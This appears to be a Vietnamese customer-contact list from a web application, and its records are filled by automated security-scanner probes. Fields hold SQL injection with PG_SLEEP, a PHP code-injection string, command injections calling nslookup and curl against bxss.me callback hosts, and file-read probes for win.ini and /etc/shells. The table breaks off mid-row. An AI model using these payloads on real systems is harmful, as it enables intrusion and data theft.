Cần liên hệ : 4008 khách hàng
ID Họ và tên Đơn vị/Cá nhân Mua mới/Nâng cấp Giới tính Đơn vị công tác Chức vụ Điện thoại Email Ghi chú
4829 lwlzjplY 1 Nữ index.php 1 555-666-0606 testing@example.com Đã gửi email
4828 lwlzjplY 1 Nữ ";print(md5(31337));$a=" 1 555-666-0606 testing@example.com Đã gửi email
4827 lwlzjplY 1 Nam 1-1) OR 456=(SELECT 456 FROM PG_SLEEP(15))-- 1 555-666-0606 testing@example.com Đã gửi email
4826 lwlzjplY 1 Nữ 1 1 bxss.me testing@example.com Đã gửi email
4825 lwlzjplY 1 Nữ index.php 1 555-666-0606 testing@example.com Đã gửi email
4824 lwlzjplY 1 Nữ 1"&&sleep(27*1000)*orikjt&&" 1 555-666-0606 testing@example.com Đã gửi email
4823 index.php/. 1 Nữ 1 1 555-666-0606 testing@example.com Đã gửi email
4822 lwlzjplY 1 Nam 1-1 OR 130=(SELECT 130 FROM PG_SLEEP(15))-- 1 555-666-0606 testing@example.com Đã gửi email
4821 lwlzjplY 1 Nữ 1 1 ;(nslookup -q=cname hitszoxytzqgcb317d.bxss.me||curl hitszoxytzqgcb317d.bxss.me)|(nslookup -q=cname hitszoxytzqgcb317d.bxss.me||curl hitszoxytzqgcb317d.bxss.me)&(nslookup -q=cname hitszoxytzqgcb317d.bxss.me||curl hitszoxytzqgcb317d.bxss.me) testing@example.com Đã gửi email
4820 lwlzjplY 1 Nữ 1 1 555-666-0606 testing@example.com Đã gửi email
4819 lwlzjplY 1 Nữ 1 1 c:/windows/win.ini testing@example.com Đã gửi email
4818 index.php 1 Nữ 1 1 555-666-0606 testing@example.com Đã gửi email
4817 lwlzjplY 1 Nữ 1 1 `(nslookup -q=cname hitqcsovywqyv921d7.bxss.me||curl hitqcsovywqyv921d7.bxss.me)` testing@example.com Đã gửi email
4816 lwlzjplY 1 Nữ Array 1 555-666-0606 testing@example.com Đã gửi email
4815 lwlzjplY 1 Nữ Array 1 555-666-0606 testing@example.com Đã gửi email
4814 lwlzjplY 1 Nữ xfs.bxss.me 1 555-666-0606 testing@example.com Đã gửi email
4813 lwlzjplY 1 Nữ 1 1 |(nslookup -q=cname hitdmdbeqnabgab7e8.bxss.me||curl hitdmdbeqnabgab7e8.bxss.me) testing@example.com Đã gửi email
4812 lwlzjplY 1 Nữ 1 1 /etc/shells testing@example.com Đã gửi email
4811 lwlzjplY 1 Nữ 1